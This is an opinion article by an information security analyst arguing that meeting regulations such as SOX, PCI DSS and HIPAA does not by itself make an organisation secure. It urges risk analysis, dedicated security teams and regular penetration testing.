In Information Security, there are a plethora of Laws and Regulations: Sarbanes-Oxley Act (SOX); Payment Card Industry Data Security Standard (PCI DSS); Gramm-Leach-Bliley Act (GLB); Electronic Fund Transfer Act, Regulation E (EFTA); Customs-Trade Partnership Against Terrorism (C-TPAT); Free and Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate Credit Transaction Act (FACTA), including the Red Flags Rule; Federal Rules of Civil Procedure (FRCP). Some of the industry-specific Guidelines and Requirements include: Federal Information Security Management Act (FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the Code of Federal Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and Accountability Act (HIPAA); The Health Information Technology for Economic and Clinical Health Act (HITECH); Patient Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: The Chemical Facility Anti-Terrorism Standards Regulation. How many of these Regulations, Laws and Guidelines a business needs to adhere to depends on what part of the world the business operates from (or is domiciled in). Laws, Regulations, Standards and Guidelines are very familiar words when it comes to Information Security. One other word that ties all the previous words together is Compliance. Compliance, generally speaking, is the basis for audits. Compliance is also the native language the Executive Management of any enterprise understands. The great debate for us, however, is: does compliance really translate to good security?

What is Good Information Security?
According to Malcolm Carrie, head of global strategy and architecture at BAE Systems, good information security covers people, process and technology. It creates the understanding, at all levels in the organization, that finding the appropriate balance of availability, integrity and confidentiality requires a full appreciation of the risks. The rush for Compliance has more or less taken center stage in recent times, and a lot of businesses (and the people driving those businesses) forget, or are unaware of the fact, that Information Security needs should primarily be the driving force for Compliance criteria and metrics; people would not erect the compliance barrier just for its own sake. In order to achieve good security, appropriate processes, practices and technologies need to be implemented. In 2014, the FBI sent a warning to the healthcare industry that its data was not secure. The biggest vulnerability was the perception among IT healthcare professionals that their current perimeter defenses and compliance strategies were working, when clearly the data stated otherwise. Lots of organizations focus on compliance and have several reams of paper to show for it: policies, procedures, and training records. Several of these organizations purchase compliance-in-a-box kits, and because the focus is on compliance and not really security, much of the content of the compliance-in-a-box kit still has the original blank spots where the name of the organization in question should have been inserted. A lot of the organizations that eventually complete their documentation might never incorporate the documentation into the corresponding process. Additionally, because assessment for compliance might be primarily based on responding to hundreds of questions in compliance assessment tools, or on discussions with consultants, many businesses will maintain that the security described in their policies and procedures is really in place. They might even believe it themselves!

The importance of compliance cannot be overemphasized, but true Information Security goes way beyond ticking boxes and answering a few generic questions that the consultant may have prepared. The goal of compliance programs is to satisfy externally imposed requirements, and the requirements in question may or may not support an effective security program. The fact that a company has been certified compliant does not guarantee that it is secure, and some obligations that it fulfills may not contribute anything to security. For every business that can afford it, building an in-house IT security team might be the best way to go, and for businesses that are unable to afford it, having knowledgeable consultants review their business process and advise, as well as help implement appropriate security solutions, would be the way to go. Irrespective of the sector a business operates in, the management needs to know that hackers will always look for loopholes, and unless a business implements a comprehensive security program and remains eternally vigilant, hackers will always find the loopholes they want, either by exploiting the OS, the infrastructure, the firmware, the process or the people. Risk analysis is also a very critical success factor in information security. Businesses should determine how much risk they are exposed to and plan accordingly after appropriately classifying the risk. Risk analysis should be done as regularly as practicable to ensure that no part of the business process is being excluded.

Ensuring that the IT security team is knowledgeable and dedicated is also a major requirement that needs to be addressed. One can never know how truly secure a system is until it has been tested. The IT security team (complementary to the testing by external consultants) needs to routinely conduct penetration testing exercises to evaluate every facet of the business process, not with the intention of achieving regulatory compliance but with the objective of determining the security posture of the business, in order to apply any needed corrective measures before vulnerabilities are exploited by hackers.

About the author: AYO TAYO BALOGUN
Information Security Analyst with Technology Support and Management experience. He’s a serial contributor and beta tester for online IT Security publications. Ayo currently works as Head of Enterprise Security at SystemSpecs Nigeria.


